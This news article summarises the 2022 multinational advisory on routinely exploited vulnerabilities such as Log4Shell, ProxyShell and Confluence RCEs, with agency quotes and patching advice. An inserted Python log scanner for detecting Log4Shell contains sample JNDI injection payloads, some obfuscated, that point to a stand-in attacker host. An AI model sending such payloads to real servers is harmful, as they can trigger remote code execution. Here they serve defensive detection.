Global cybersecurity authorities release details on top routinely exploited vulnerabilities in 2022

Global cybersecurity agencies reveal in their latest joint cybersecurity advisory that in 2022, malicious cyber actors exploited older software vulnerabilities more frequently than recently disclosed vulnerabilities and targeted unpatched, internet-facing systems. The advisory also details the CVEs (Common Vulnerabilities and Exposures) routinely and frequently exploited by malicious cyber actors in 2022, along with the associated Common Weakness Enumerations (CWEs).

Furthermore, the notice disclosed that malicious cyber actors continued exploiting known software vulnerabilities to target unpatched systems and applications, including some vulnerabilities that have been known for more than five years. 

“Proof of concept (PoC) code was publicly available for many of the software vulnerabilities or vulnerability chains, likely facilitating exploitation by a broader range of malicious cyber actors,” said the advisory, published by the U.S. Cybersecurity and Infrastructure Security Agency (CISA), National Security Agency (NSA), and Federal Bureau of Investigation (FBI); Australian Signals Directorate’s Australian Cyber Security Centre (ACSC); Canadian Centre for Cyber Security (CCCS); New Zealand National Cyber Security Centre (NCSC-NZ) and Computer Emergency Response Team New Zealand (CERT-NZ); and the U.K.’s National Cyber Security Centre.

“Malicious cyber actors generally have the most success exploiting known vulnerabilities within the first two years of public disclosure—the value of such vulnerabilities gradually decreases as software is patched or upgraded,” the advisory noted. “Timely patching reduces the effectiveness of known, exploitable vulnerabilities, possibly decreasing the pace of malicious cyber actor operations and forcing pursuit of more costly and time-consuming methods (such as developing zero-day exploits or conducting software supply chain operations).”

The advisory added that malicious cyber actors likely prioritize developing exploits for severe and globally prevalent CVEs. “While sophisticated actors also develop tools to exploit other vulnerabilities, developing exploits for critical, wide-spread, and publicly known vulnerabilities gives actors low-cost, high-impact tools they can use for several years.”

Additionally, cyber actors likely give higher priority to vulnerabilities that are more prevalent in their specific targets’ networks. “Multiple CVE or CVE chains require the actor to send a malicious web request to the vulnerable device, which often includes unique signatures that can be detected through deep packet inspection,” the notice revealed.

Eric Goldstein, executive assistant director for cybersecurity at CISA, said in a media statement that adversaries commonly exploit categories of vulnerabilities that can and must be addressed by technology providers as part of their commitment to secure by design.

“Until that day, malicious actors will continue to find it far too easy to exploit organizations around the world,” according to Goldstein. “With our partners, we urge all organizations to review our joint advisory, for every enterprise to prioritize mitigation of these vulnerabilities, and for every technology provider to take accountability for the security outcomes of their customers by reducing the prevalence of these vulnerabilities by design.”

“Organizations continue using unpatched software and systems, leaving easily discovered openings for cyber actors to target,” Neal Ziring, technical director for NSA’s Cybersecurity Directorate, said in an NSA media statement. “Older vulnerabilities can provide low-cost and high impact means for these actors to access sensitive data.”

The global agencies have identified the top 12 vulnerabilities that the co-authors have observed malicious cyber actors routinely exploiting in 2022.

The CVE-2018-13379 vulnerability, affecting Fortinet SSL VPNs, was also routinely exploited in 2020 and 2021. The continued exploitation indicates that many organizations failed to patch software in a timely manner and remain vulnerable to malicious cyber actors.

The CVE-2021-34473, CVE-2021-31207, and CVE-2021-34523 vulnerabilities, known collectively as ProxyShell, affect Microsoft Exchange email servers. Chained together, successful exploitation enables a remote actor to execute arbitrary code. These vulnerabilities reside within the Microsoft Client Access Service (CAS), which typically runs on port 443 in Microsoft Internet Information Services (IIS), Microsoft’s web server. CAS is commonly exposed to the internet to enable users to access their email via mobile devices and web browsers.

The CVE-2021-40539 vulnerability enables unauthenticated remote code execution (RCE) in Zoho ManageEngine AD SelfService Plus and was linked to the usage of an outdated third-party dependency. Initial exploitation of this vulnerability began in late 2021 and continued throughout 2022.

The CVE-2021-26084 vulnerability affecting Atlassian Confluence Server and Data Center (a web-based collaboration tool used by governments and private companies) could enable an unauthenticated cyber actor to execute arbitrary code on vulnerable systems. The vulnerability became one of the most routinely exploited vulnerabilities after a PoC was released within a week of its disclosure. Attempted mass exploitation of this vulnerability was observed in September 2021.

The CVE-2021-44228 vulnerability, known as Log4Shell, affected Apache’s Log4j library, an open-source logging framework incorporated into thousands of products worldwide. An actor can exploit this vulnerability by submitting a specially crafted request to a vulnerable system, causing the execution of arbitrary code. The request allows a cyber actor to take full control of a system. The actor can then steal information, launch ransomware, or conduct other malicious activity. Malicious cyber actors began exploiting the vulnerability after it was publicly disclosed in December 2021, and continued to show high interest in CVE-2021-44228 through the first half of 2022.
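As an added example (not code from the advisory or this article), the scanner below illustrates the "unique signatures" point made earlier about detecting malicious web requests: it runs over constructed web access log lines and flags a Log4Shell (CVE-2021-44228) JNDI lookup, first collapsing the URL encoding and nested Log4j lookups that a literal `${jndi:` match would miss. The log lines, client IPs and the `attacker.invalid` hostname are constructed sample data.

```python
import re
from urllib.parse import unquote

# Constructed web access log (not from the advisory). Lines 2-5 carry a JNDI lookup in a
# header or query string; lines 3-5 obfuscate it. Line 6 is benign (the bare word is not a lookup).
SAMPLE_LOG = """\
10.0.0.5 - - [12/Dec/2021:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.6 - - [12/Dec/2021:10:01:03 +0000] "GET /login HTTP/1.1" 200 734 "-" "${jndi:ldap://attacker.invalid/a}"
10.0.0.7 - - [12/Dec/2021:10:01:04 +0000] "GET /api?x=${${lower:j}ndi:rmi://attacker.invalid/b} HTTP/1.1" 404 0 "-" "curl/7.79"
10.0.0.8 - - [12/Dec/2021:10:01:05 +0000] "GET / HTTP/1.1" 200 100 "${${::-j}${::-n}${::-d}${::-i}:dns://attacker.invalid/c}" "Mozilla/5.0"
10.0.0.9 - - [12/Dec/2021:10:01:06 +0000] "GET /?u=%24%7Bjndi%3Aldap%3A//attacker.invalid/d%7D HTTP/1.1" 200 100 "-" "Mozilla/5.0"
10.0.0.10 - - [12/Dec/2021:10:01:07 +0000] "GET /search?q=jndi HTTP/1.1" 200 88 "-" "Mozilla/5.0"
"""

_INNER = re.compile(r"\$\{([^${}]*)\}")           # innermost ${...} with no nested braces
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)

def _resolve(expr: str) -> str:
    """Reduce one inner Log4j lookup to its expansion: ${x:-v} -> v, ${lower:X} -> x, else the key."""
    if ":-" in expr:
        return expr.split(":-", 1)[1]
    prefix, sep, rest = expr.partition(":")
    if not sep:
        return expr
    if prefix.lower() == "lower":
        return rest.lower()
    return rest                                     # unknown lookup: keep its key text, conservatively

def normalize(text: str) -> str:
    """URL-decode, then collapse nested obfuscating lookups until stable; a ${jndi:...} lookup stays put."""
    def repl(m):
        if m.group(1).lstrip().lower().startswith("jndi:"):
            return m.group(0)
        return _resolve(m.group(1))
    text = unquote(text)
    prev = None
    while prev != text:                             # each non-JNDI rewrite shortens the string, so this ends
        prev = text
        text = _INNER.sub(repl, text)
    return text

def scan_log(log_text: str) -> list:
    """Return (line number, client IP, normalized line) for every line carrying a JNDI lookup."""
    hits = []
    for n, line in enumerate(log_text.splitlines(), 1):
        norm = normalize(line)
        if _JNDI.search(norm):
            hits.append((n, line.split(" ", 1)[0], norm))
    return hits
```

Running `scan_log(SAMPLE_LOG)` flags lines 2 through 5 and leaves the benign search on line 6 alone; a string-literal match for `${jndi:` would have caught only line 2.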

The CVE-2022-22954 and CVE-2022-22960 vulnerabilities allow RCE, privilege escalation, and authentication bypass in VMware Workspace ONE Access, Identity Manager, and other VMware products. A malicious cyber actor with network access could trigger a server-side template injection that may result in remote code execution. Exploitation of CVE-2022-22954 and CVE-2022-22960 began in early 2022 and attempts continued throughout the remainder of the year.

The CVE-2022-1388 vulnerability allows unauthenticated malicious cyber actors to bypass iControl REST authentication on F5 BIG-IP application delivery and security software. 

The CVE-2022-30190 vulnerability impacts the Microsoft Support Diagnostic Tool (MSDT) in Windows. A remote, unauthenticated cyber actor could exploit this vulnerability to take control of an affected system.

The critical RCE vulnerability CVE-2022-26134 impacts Atlassian Confluence and Data Center. The vulnerability, which was likely initially exploited as a zero-day before public disclosure in June 2022, is related to an older Confluence vulnerability (CVE-2021-26084), which cyber actors also exploited in 2022.

The authoring agencies recommend that vendors and developers implement secure-by-design and -default principles and tactics to reduce the prevalence of vulnerabilities in their software. They suggest following the Secure Software Development Framework (SSDF), also known as SP 800-218, and implementing secure design practices in each stage of the software development life cycle (SDLC). As part of this, they recommend establishing a coordinated vulnerability disclosure program that includes processes to determine the root causes of discovered vulnerabilities.

The agencies also advise prioritizing secure-by-default configurations, such as eliminating default passwords or requiring additional configuration changes to enhance product security. They also call for ensuring that published CVEs include the proper CWE field identifying the root cause of the vulnerability.

When it comes to end-user organizations, the global agencies suggest applying timely patches to systems; implementing a centralized patch management system; and using security tools, such as endpoint detection and response (EDR), web application firewalls, and network protocol analyzers. They also recommend asking software providers to discuss their secure by design program and to provide links to information about how they are working to remove classes of vulnerabilities and to set secure default settings.

Commenting on the latest cybersecurity advisory, Ron Fabela, CTO of XONA Systems, wrote in an emailed statement that, in continued efforts to amplify the ‘secure by design’ challenge, CISA, along with international partners, released the 2022 Top Routinely Exploited Vulnerabilities advisory today.

“While all identified CVEs affect traditional enterprise technologies, these systems are often the gateway into critical infrastructure attacks,” according to Fabela. “Although no OT specific CVEs are listed in this advisory, critical environments rely heavily on supporting enterprise infrastructure, inheriting these routinely exploited attack surface threats, and must be considered in overall IT/OT security planning.”

Fabela added that it’s well known that threat actors will only use the bare minimum needed to gain access and achieve their objectives. “As long as unpatched perimeter and user access systems have years-old vulnerabilities in production, these will be the preferred methods for initial access. For instance, the first Fortinet SSL bug for VPNs is still being exploited 3 years later.”
